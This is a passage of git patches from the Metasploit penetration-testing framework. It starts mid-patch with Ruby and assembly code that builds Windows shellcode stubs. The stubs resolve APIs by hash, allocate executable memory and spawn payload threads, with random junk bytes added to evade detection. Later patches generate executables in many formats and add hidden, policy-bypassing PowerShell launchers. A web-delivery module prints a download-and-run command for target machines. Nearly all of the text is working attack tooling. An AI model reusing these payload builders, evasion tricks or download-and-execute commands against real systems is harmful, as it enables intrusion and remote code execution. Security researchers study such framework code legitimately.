+    loop_funcname:           ;
+      xor eax, eax           ; Clear EAX
+      lodsb                  ; Read in the next byte of the ASCII function name
+      ror edi, 13            ; Rotate right our hash value
+      add edi, eax           ; Add the next byte of the name
+      cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+      jne loop_funcname      ; If we have not reached the null terminator, continue
+      add edi, [ebp-8]       ; Add the current module hash to the function hash
+      cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for
+      jnz get_next_func      ; Go compute the next function hash if we have not found it
+      ; If found, fix up stack, call the function and then value else compute the next one...
+      pop eax                ; Restore the current modules EAT
+      mov ebx, [eax+36]      ; Get the ordinal table rva
+      add ebx, edx           ; Add the modules base address
+      mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+      mov ebx, [eax+28]      ; Get the function addresses table rva
+      add ebx, edx           ; Add the modules base address
+      mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+      add eax, edx           ; Add the modules base address to get the functions actual VA
+      ; We now fix up the stack and perform the call to the desired function...
+    finish:
+      mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+      pop ebx                ; Clear off the current modules hash
+      pop ebx                ; Clear off the current position in the module list
+      popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+      pop ecx                ; Pop off the origional return address our caller will have pushed
+      pop edx                ; Pop off the hash value our caller will have pushed
+      push ecx               ; Push back the correct return value
+      jmp eax                ; Jump into the required function
+      ; We now automagically return to the correct caller...
+    get_next_mod:            ;
+      pop eax                ; Pop off the current (now the previous) modules EAT
+    get_next_mod1:           ;
+      pop edi                ; Pop off the current (now the previous) modules hash
+      pop edx                ; Restore our position in the module list
+      mov edx, [edx]         ; Get the next module
+      jmp next_mod           ; Process this module
+    ^
+
+    stub_exit = %Q^
+    ; Input: EBP must be the address of 'api_call'.
+    ; Output: None.
+    ; Clobbers: EAX, EBX, (ESP will also be modified)
+    ; Note: Execution is not expected to (successfully) continue past this block
+
+    exitfunk:
+      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
+      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
+      cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
+      jl goodbye             ; Then just call the exit function...
+      cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+      jne goodbye      ;
+      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+    goodbye:                 ; We now perform the actual call to the exit function
+      push byte 0            ; push the exit function parameter
+      push ebx               ; push the hash of the exit function
+      call ebp               ; call EXITFUNK( 0 );
+    ^
+
+    stub_alloc = %Q^
+      cld                    ; Clear the direction flag.
+      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+    delta:                   ;
+    #{stub_block}
+    start:                   ;
+      pop ebp                ; Pop off the address of 'api_call' for calling later.
+
+    allocate_size:
+       mov esi, #{code.length}
+
+    allocate:
+      push byte 0x40         ; PAGE_EXECUTE_READWRITE
+      push 0x1000            ; MEM_COMMIT
+      push esi               ; Push the length value of the wrapped code block
+      push byte 0            ; NULL as we dont care where the allocation is.
+      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+      mov ebx, eax           ; Store allocated address in ebx
+      mov edi, eax           ; Prepare EDI with the new address
+      mov ecx, esi           ; Prepare ECX with the length of the code
+      call get_payload
+    got_payload:
+      pop esi                ; Prepare ESI with the source to copy
+      rep movsb              ; Copy the payload to RWX memory
+      call set_handler       ; Configure error handling
+
+    exitblock:
+    #{stub_exit}
+    set_handler:
+      xor eax,eax
+      push dword [fs:eax]
+      mov dword [fs:eax], esp
+      call ebx
+      jmp exitblock
+    ^
+
+    stub_final = %Q^
+    get_payload:
+      call got_payload
+    payload:
+    ; Append an arbitrary payload here
+    ^
+
+    stub_alloc.gsub!('short', '')
+    stub_alloc.gsub!('byte', '')
+
+    wrapper = ""
+    # regs    = %W{eax ebx ecx edx esi edi ebp}
+
+    cnt_jmp = 0
+    stub_alloc.each_line do |line|
+      line.gsub!(/;.*/, '')
+      line.strip!
+      next if line.empty?
+
+      if (rand(2) == 0)
+        wrapper << "nop\n"
+      end
+
+      if(rand(2) == 0)
+        wrapper << "jmp autojump#{cnt_jmp}\n"
+        1.upto(rand(8)+8) do
+          wrapper << "db 0x#{"%.2x" % rand(0x100)}\n"
+        end
+        wrapper << "autojump#{cnt_jmp}:\n"
+        cnt_jmp += 1
+      end
+      wrapper << line + "\n"
+    end
+
+    wrapper << stub_final
+
+    enc = Metasm::Shellcode.assemble(Metasm::Ia32.new, wrapper).encoded
+    res = enc.data + code
+
+    res
+  end
+
+  # This wrapper is responsible for allocating RWX memory, copying the
+  # target code there, setting an exception handler that calls ExitProcess,
+  # starting the code in a new thread, and finally jumping back to the next
+  # code to execute. block_offset is the offset of the next code from
+  # the start of this code
+  def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
+
+    stub_block = %Q^
+    ; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+    ; Output: The return value from the API call will be in EAX.
+    ; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+    ; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+    ; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+    ; Note: This function is unable to call forwarded exports.
+
+    api_call:
+      pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+      mov ebp, esp           ; Create a new stack frame
+      xor edx, edx           ; Zero EDX
+      mov edx, [fs:edx+48]   ; Get a pointer to the PEB
+      mov edx, [edx+12]      ; Get PEB->Ldr
+      mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+    next_mod:                ;
+      mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+      movzx ecx, word [edx+38] ; Set ECX to the length we want to check
+      xor edi, edi           ; Clear EDI which will store the hash of the module name
+    loop_modname:            ;
+      xor eax, eax           ; Clear EAX
+      lodsb                  ; Read in the next byte of the name
+      cmp al, 'a'            ; Some versions of Windows use lower case module names
+      jl not_lowercase       ;
+      sub al, 0x20           ; If so normalise to uppercase
+    not_lowercase:           ;
+      ror edi, 13            ; Rotate right our hash value
+      add edi, eax           ; Add the next byte of the name
+      loop loop_modname      ; Loop until we have read enough
+      ; We now have the module hash computed
+      push edx               ; Save the current position in the module list for later
+      push edi               ; Save the current module hash for later
+      ; Proceed to iterate the export address table,
+      mov edx, [edx+16]      ; Get this modules base address
+      mov eax, [edx+60]      ; Get PE header
+      add eax, edx           ; Add the modules base address
+      mov eax, [eax+120]     ; Get export tables RVA
+      test eax, eax          ; Test if no export address table is present
+      jz get_next_mod1       ; If no EAT present, process the next module
+      add eax, edx           ; Add the modules base address
+      push eax               ; Save the current modules EAT
+      mov ecx, [eax+24]      ; Get the number of function names
+      mov ebx, [eax+32]      ; Get the rva of the function names
+      add ebx, edx           ; Add the modules base address
+      ; Computing the module hash + function hash
+    get_next_func:           ;
+      jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
+      dec ecx                ; Decrement the function name counter
+      mov esi, [ebx+ecx*4]   ; Get rva of next module name
+      add esi, edx           ; Add the modules base address
+      xor edi, edi           ; Clear EDI which will store the hash of the function name
+      ; And compare it to the one we want
+    loop_funcname:           ;
+      xor eax, eax           ; Clear EAX
+      lodsb                  ; Read in the next byte of the ASCII function name
+      ror edi, 13            ; Rotate right our hash value
+      add edi, eax           ; Add the next byte of the name
+      cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+      jne loop_funcname      ; If we have not reached the null terminator, continue
+      add edi, [ebp-8]       ; Add the current module hash to the function hash
+      cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for
+      jnz get_next_func      ; Go compute the next function hash if we have not found it
+      ; If found, fix up stack, call the function and then value else compute the next one...
+      pop eax                ; Restore the current modules EAT
+      mov ebx, [eax+36]      ; Get the ordinal table rva
+      add ebx, edx           ; Add the modules base address
+      mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+      mov ebx, [eax+28]      ; Get the function addresses table rva
+      add ebx, edx           ; Add the modules base address
+      mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+      add eax, edx           ; Add the modules base address to get the functions actual VA
+      ; We now fix up the stack and perform the call to the desired function...
+    finish:
+      mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+      pop ebx                ; Clear off the current modules hash
+      pop ebx                ; Clear off the current position in the module list
+      popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+      pop ecx                ; Pop off the origional return address our caller will have pushed
+      pop edx                ; Pop off the hash value our caller will have pushed
+      push ecx               ; Push back the correct return value
+      jmp eax                ; Jump into the required function
+      ; We now automagically return to the correct caller...
+    get_next_mod:            ;
+      pop eax                ; Pop off the current (now the previous) modules EAT
+    get_next_mod1:           ;
+      pop edi                ; Pop off the current (now the previous) modules hash
+      pop edx                ; Restore our position in the module list
+      mov edx, [edx]         ; Get the next module
+      jmp next_mod           ; Process this module
+    ^
+
+    stub_exit = %Q^
+    ; Input: EBP must be the address of 'api_call'.
+    ; Output: None.
+    ; Clobbers: EAX, EBX, (ESP will also be modified)
+    ; Note: Execution is not expected to (successfully) continue past this block
+
+    exitfunk:
+      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
+      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
+      cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
+      jl goodbye       ; Then just call the exit function...
+      cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+      jne goodbye      ;
+      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+    goodbye:                 ; We now perform the actual call to the exit function
+      push byte 0            ; push the exit function parameter
+      push ebx               ; push the hash of the exit function
+      call ebp               ; call EXITFUNK( 0 );
+    ^
+
+    stub_alloc = %Q^
+      pushad                 ; Save registers
+      cld                    ; Clear the direction flag.
+      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+    delta:                   ;
+    #{stub_block}
+    start:                   ;
+      pop ebp                ; Pop off the address of 'api_call' for calling later.
+
+    allocate_size:
+       mov esi,#{code.length}
+
+    allocate:
+      push byte 0x40         ; PAGE_EXECUTE_READWRITE
+      push 0x1000            ; MEM_COMMIT
+      push esi               ; Push the length value of the wrapped code block
+      push byte 0            ; NULL as we dont care where the allocation is.
+      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+      mov ebx, eax           ; Store allocated address in ebx
+      mov edi, eax           ; Prepare EDI with the new address
+      mov ecx, esi           ; Prepare ECX with the length of the code
+      call get_payload
+    got_payload:
+      pop esi                ; Prepare ESI with the source to copy
+      rep movsb              ; Copy the payload to RWX memory
+      call set_handler       ; Configure error handling
+
+    exitblock:
+    #{stub_exit}
+
+    set_handler:
+      xor eax,eax
+;		  push dword [fs:eax]
+;		  mov dword [fs:eax], esp
+      push eax               ; LPDWORD lpThreadId (NULL)
+      push eax               ; DWORD dwCreationFlags (0)
+      push eax               ; LPVOID lpParameter (NULL)
+      push ebx               ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
+      push eax               ; SIZE_T dwStackSize (0 for default)
+      push eax               ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
+      push 0x160D6838        ; hash( "kernel32.dll", "CreateThread" )
+      call ebp               ; Spawn payload thread
+
+      pop eax                ; Skip
+;		  pop eax                ; Skip
+      pop eax                ; Skip
+      popad                  ; Get our registers back
+;		  sub esp, 44             ; Move stack pointer back past the handler
+    ^
+
+    stub_final = %Q^
+    get_payload:
+      call got_payload
+    payload:
+    ; Append an arbitrary payload here
+    ^
+
+
+    stub_alloc.gsub!('short', '')
+    stub_alloc.gsub!('byte', '')
+
+    wrapper = ""
+    # regs    = %W{eax ebx ecx edx esi edi ebp}
+
+    cnt_jmp = 0
+    cnt_nop = 64
+
+    stub_alloc.each_line do |line|
+      line.gsub!(/;.*/, '')
+      line.strip!
+      next if line.empty?
+
+      if (cnt_nop > 0 and rand(4) == 0)
+        wrapper << "nop\n"
+        cnt_nop -= 1
+      end
+
+      if(cnt_nop > 0 and rand(16) == 0)
+        cnt_nop -= 2
+        cnt_jmp += 1
+
+        wrapper << "jmp autojump#{cnt_jmp}\n"
+        1.upto(rand(8)+1) do
+          wrapper << "db 0x#{"%.2x" % rand(0x100)}\n"
+          cnt_nop -= 1
+        end
+        wrapper << "autojump#{cnt_jmp}:\n"
+      end
+      wrapper << line + "\n"
+    end
+
+    #someone who knows how to use metasm please explain the right way to do this.
+    wrapper << "db 0xe9\n db 0xFF\n db 0xFF\n db 0xFF\n db 0xFF\n"
+    wrapper << stub_final
+
+    enc = Metasm::Shellcode.assemble(Metasm::Ia32.new, wrapper).encoded
+    soff = enc.data.index("\xe9\xff\xff\xff\xff") + 1
+    res = enc.data + code
+
+    if which_offset == 'start'
+      res[soff,4] = [block_offset - (soff + 4)].pack('V')
+    elsif which_offset == 'end'
+      res[soff,4] = [res.length - (soff + 4) + block_offset].pack('V')
+    else
+      raise RuntimeError, 'Blast! Msf::Util::EXE.rwx_exec_thread called with invalid offset!'
+    end
+    res
+  end
+
+
+  #
+  # Generate an executable of a given format suitable for running on the
+  # architecture/platform pair.
+  #
+  # This routine is shared between msfencode, rpc, and payload modules (use
+  # <payload>)
+  #
+  # @param framework [Framework]
+  # @param arch [String] Architecture for the target format; one of the ARCH_*
+  # constants
+  # @param plat [#index] platform
+  # @param code [String] The shellcode for the resulting executable to run
+  # @param fmt [String] One of the executable formats as defined in
+  #   {.to_executable_fmt_formats}
+  # @param exeopts [Hash] Passed directly to the approrpriate method for
+  #   generating an executable for the given +arch+/+plat+ pair.
+  # @return [String] An executable appropriate for the given
+  #   architecture/platform pair.
+  # @return [nil] If the format is unrecognized or the arch and plat don't
+  #   make sense together.
+  def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
+    # For backwards compatibility with the way this gets called when
+    # generating from Msf::Simple::Payload.generate_simple
+    if arch.kind_of? Array
+      output = nil
+      arch.each do |a|
+        output = to_executable_fmt(framework, a, plat, code, fmt, exeopts)
+        break if output
+      end
+      return output
+    end
+
+    case fmt
+    when 'asp'
+      exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
+      output = Msf::Util::EXE.to_exe_asp(exe, exeopts)
+
+    when 'aspx'
+      exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
+      output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
+
+    when 'dll'
+      output = case arch
+        when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
+        when ARCH_X86_64  then to_win64pe_dll(framework, code, exeopts)
+        when ARCH_X64     then to_win64pe_dll(framework, code, exeopts)
+        end
+    when 'exe'
+      output = case arch
+        when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
+        when ARCH_X86_64  then to_win64pe(framework, code, exeopts)
+        when ARCH_X64     then to_win64pe(framework, code, exeopts)
+        end
+
+    when 'exe-service'
+      output = case arch
+        when ARCH_X86,nil then to_win32pe_service(framework, code, exeopts)
+        when ARCH_X86_64  then to_win64pe_service(framework, code, exeopts)
+        when ARCH_X64     then to_win64pe_service(framework, code, exeopts)
+      end
+
+    when 'exe-small'
+      output = case arch
+        when ARCH_X86,nil then to_win32pe_old(framework, code, exeopts)
+        end
+
+    when 'exe-only'
+      output = case arch
+        when ARCH_X86,nil then to_winpe_only(framework, code, exeopts, arch)
+        when ARCH_X86_64  then to_winpe_only(framework, code, exeopts, arch)
+        when ARCH_X64     then to_winpe_only(framework, code, exeopts, arch)
+        end
+
+    when 'elf'
+      if (not plat or (plat.index(Msf::Module::Platform::Linux)))
+        output = case arch
+          when ARCH_X86,nil then to_linux_x86_elf(framework, code, exeopts)
+          when ARCH_X86_64  then to_linux_x64_elf(framework, code, exeopts)
+          when ARCH_X64     then to_linux_x64_elf(framework, code, exeopts)
+          when ARCH_ARMLE   then to_linux_armle_elf(framework, code, exeopts)
+          when ARCH_MIPSBE  then to_linux_mipsbe_elf(framework, code, exeopts)
+          when ARCH_MIPSLE  then to_linux_mipsle_elf(framework, code, exeopts)
+          end
+      elsif(plat and (plat.index(Msf::Module::Platform::BSD)))
+        output = case arch
+          when ARCH_X86,nil then Msf::Util::EXE.to_bsd_x86_elf(framework, code, exeopts)
+          end
+      elsif(plat and (plat.index(Msf::Module::Platform::Solaris)))
+        output = case arch
+          when ARCH_X86,nil then to_solaris_x86_elf(framework, code, exeopts)
+          end
+      end
+
+    when 'macho'
+      output = case arch
+        when ARCH_X86,nil then to_osx_x86_macho(framework, code, exeopts)
+        when ARCH_X86_64  then to_osx_x64_macho(framework, code, exeopts)
+        when ARCH_X64     then to_osx_x64_macho(framework, code, exeopts)
+        when ARCH_ARMLE   then to_osx_arm_macho(framework, code, exeopts)
+        when ARCH_PPC     then to_osx_ppc_macho(framework, code, exeopts)
+        end
+
+    when 'vba'
+      output = Msf::Util::EXE.to_vba(framework, code, exeopts)
+
+    when 'vba-exe'
+      exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
+      output = Msf::Util::EXE.to_exe_vba(exe)
+
+    when 'vbs'
+      exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
+      output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => false }))
+
+    when 'loop-vbs'
+      exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
+      output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
+
+    when 'war'
+      arch ||= [ ARCH_X86 ]
+      tmp_plat = plat.platforms if plat
+      tmp_plat ||= Msf::Module::PlatformList.transform('win')
+      exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
+      output = Msf::Util::EXE.to_jsp_war(exe)
+
+    when 'psh'
+      output = Msf::Util::EXE.to_win32pe_psh(framework, code, exeopts)
+
+    when 'psh-net'
+      output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts)
+
+    end
+
+    output
+  end
+
+  def self.to_executable_fmt_formats
+    [
+      'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
+      'vbs','loop-vbs','asp','aspx','war','psh','psh-net'
+    ]
+  end
+
+  #
+  # EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR
+  #
+  def self.is_eicar_corrupted?
+    path = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "..", "..", "data", "eicar.com"))
+    return true if not ::File.exists?(path)
+
+    begin
+      data = ::File.read(path)
+      if Digest::SHA1.hexdigest(data) != "3395856ce81f2b7382dee72602f798b642f14140"
+        return true
+      end
+
+    rescue ::Exception
+      return true
+    end
+
+    false
+  end
 
 end
 end
 end
+

From b4d1fd6ff83e88e6844726a981023aab9f048cfd Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 13 Sep 2013 21:15:28 +0100
Subject: [PATCH 015/321] Fixup rex text

---
 lib/rex/exploitation/powershell.rb | 4 +++-
 lib/rex/text.rb                    | 3 ++-
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 7bb85d2538..d8e2211f44 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -379,7 +379,9 @@ module Powershell
     # Convert binary to byte array, read from file if able
     #
     def self.to_byte_array(input_data,var_name="buf")
-      code = code.unpack('C*')
+      return "[Byte[]]$#{name} = ''" if input_data.nil? or input_data.empty?
+
+      code = input_data.unpack('C*')
       psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
       lines = []
       1.upto(code.length-1) do |byte|
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index 84168a7f09..bcb8bbfdef 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -3,6 +3,7 @@ require 'digest/md5'
 require 'digest/sha1'
 require 'stringio'
 require 'cgi'
+require 'rex/exploitation/powershell'
 
 %W{ iconv zlib }.each do |libname|
   begin
@@ -202,7 +203,7 @@ module Text
   # Converts a raw string to a powershell byte array
   #
   def self.to_powershell(str, name = "buf")
-    return Rex::Exploitation::Powershell.to_byte_array(str, name)
+    return Rex::Exploitation::Powershell::Script.to_byte_array(str, name)
   end
 
   #

From 60328d5b2add13deabd28ea450d3befd40200c93 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 13 Sep 2013 21:22:15 +0100
Subject: [PATCH 016/321] Bypass no profile and hidden by default

---
 lib/msf/core/exploit/powershell.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index dffb9da0a4..b1444680e7 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -80,7 +80,7 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = "-e #{ compress_script(ps_code) }"
+    ps_args = "-w hidden -nop -ep bypass -e #{ compress_script(ps_code) }"
 
     ps_wrapper = <<EOS
 $si=New-Object System.Diagnostics.ProcessStartInfo
@@ -119,7 +119,7 @@ EOS
     # Wrap in hidden runtime
     psh_payload = run_hidden_psh(psh_payload,ps_bin)
     # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start /min powershell.exe -c #{psh_payload}\r\n"
+    command = "%COMSPEC% /B /C start /min powershell.exe -w hidden -nop -ep bypass -c #{psh_payload}\r\n"
   end
 
 

From d6f2da690aa21186db4268716e389ce1a9550978 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 13 Sep 2013 21:27:59 +0100
Subject: [PATCH 017/321] Fix web delivery

---
 modules/exploits/windows/misc/psh_web_delivery.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 08d679c2b9..3514de3589 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
     print_status("Run the following command on the target machine:")
-    print_line("powershell.exe -w hidden -nop -ep bypass -c #{download_and_run})
+    print_line("powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}")
   end
 end
 

From 9aca98a9d4f7144e71afcb83549f06e85a4a69ac Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 17 Sep 2013 19:12:49 +0100
Subject: [PATCH 018/321] Dont need to bypass

---
 lib/msf/core/exploit/powershell.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index b1444680e7..7ac22050a3 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -80,7 +80,7 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = "-w hidden -nop -ep bypass -e #{ compress_script(ps_code) }"
+    ps_args = "-w hidden -nop -e #{ compress_script(ps_code) }"
 
     ps_wrapper = <<EOS
 $si=New-Object System.Diagnostics.ProcessStartInfo
@@ -119,7 +119,7 @@ EOS
     # Wrap in hidden runtime
     psh_payload = run_hidden_psh(psh_payload,ps_bin)
     # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start /min powershell.exe -w hidden -nop -ep bypass -c #{psh_payload}\r\n"
+    command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{psh_payload}\r\n"
   end
 
 

From 5add142789339c3b400b1e1200f2753d13a34ee1 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 20 Sep 2013 13:47:51 +0100
Subject: [PATCH 019/321] Choose smallest smallest

---
 lib/msf/core/exploit/powershell.rb | 32 +++++++++++++++++++++++++++---
 lib/rex/exploitation/powershell.rb | 13 +++++++++++-
 2 files changed, 41 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 7ac22050a3..1a4a3b66f1 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -61,6 +61,20 @@ module Exploit::Powershell
     return new_subs
   end
 
+  #
+  # Return an encoded powershell script
+  # Will invoke PSH modifiers as enabled
+  #
+  def encode_script(script_in, eof = nil)
+    # Build script object
+    psh = PshScript.new(script_in)
+    # Invoke enabled modifiers
+    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+      mod_method = k.split('::').last.intern
+      psh.send(mod_method)
+    end
+    return psh.encode_code(eof)
+  end
   #
   # Return a gzip compressed powershell script
   # Will invoke PSH modifiers as enabled
@@ -80,7 +94,7 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = "-w hidden -nop -e #{ compress_script(ps_code) }"
+    ps_args = "-w hidden -nop -e #{ps_code}"
 
     ps_wrapper = <<EOS
 $si=New-Object System.Diagnostics.ProcessStartInfo
@@ -116,10 +130,22 @@ EOS
     end
     # Determine appropriate architecture, manual method reduces script size
 		ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
+
+
+    compressed = compress_script(psh_payload)
+    encoded = encode_script(psh_payload)
+
+    if (encoded.length <= compressed.length)
+      smallest_payload = encoded
+    else
+      smallest_payload = compressed
+    end
+
     # Wrap in hidden runtime
-    psh_payload = run_hidden_psh(psh_payload,ps_bin)
+    final_payload = run_hidden_psh(smallest_payload,ps_bin)
+
     # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{psh_payload}\r\n"
+    command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{final_payload}\r\n"
   end
 
 
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index d8e2211f44..195834538d 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -28,7 +28,18 @@ module Powershell
 			end
 			return numbered
 		end
+    #
+    # Return a Base64 encoded powershell code
+    #
+    def encode_code(eof = nil)
+      # Convert expression to unicode
+      unicode_expression = Rex::Text.to_unicode(code)
 
+      # Base64 encode the unicode expression
+      @code = Rex::Text.encode_base64(unicode_expression)
+
+      return code
+    end
 		#
 		# Return a zlib compressed powershell code
 		#
@@ -44,7 +55,7 @@ module Powershell
 			psh_expression =  "$stream = New-Object IO.MemoryStream(,"
 			psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
 			# Uncompress and invoke the expression (execute)
-			psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
+			psh_expression << "$(IEX $(New-Object IO.StreamReader("
 			psh_expression << "$(New-Object IO.Compression.GzipStream("
 			psh_expression << "$stream,"
 			psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"

From 971d0b7536cd9102443243b1c7db808b1cab340f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 27 Sep 2013 12:45:48 +0100
Subject: [PATCH 020/321] Generate args

---
 lib/msf/core/exploit/powershell.rb            | 91 ++++++++++++++++++-
 .../exploits/windows/misc/psh_web_delivery.rb |  8 +-
 2 files changed, 94 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 1a4a3b66f1..a9c95f1fb3 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -75,6 +75,7 @@ module Exploit::Powershell
     end
     return psh.encode_code(eof)
   end
+
   #
   # Return a gzip compressed powershell script
   # Will invoke PSH modifiers as enabled
@@ -90,11 +91,89 @@ module Exploit::Powershell
     return psh.compress_code(eof)
   end
 
+  #
+  # Generate a powershell command line
+  #
+  def generate_psh_command_line(opts)
+    if opts[:path] and opts[:path][-1,1] == "\\"
+      opts[:path] << "\\"
+    end
+
+    args = generate_psh_args(opts)
+    return "#{opts[:path]}powershell.exe #{args}"
+  end
+
+  #
+  # Generate arguments for the powershell command
+  #
+  def generate_psh_args(opts)
+    arg_string = ""
+    opts.each_pair do |arg, value|
+      case arg
+      when :encodedcommand
+        arg_string << "-EncodedCommand #{value} " if value
+      when :executionpolicy
+        arg_string << "-ExecutionPolicy #{value} " if value
+      when :inputformat
+        arg_string << "-InputFormat #{value} " if value
+      when :file
+        arg_string << "-File #{value} " if value
+      when :noexit
+        arg_string << "-NoExit " if value
+      when :nologo
+        arg_string << "-NoLogo " if value
+      when :noninteractive
+        arg_string << "-NonInteractive " if value
+      when :mta
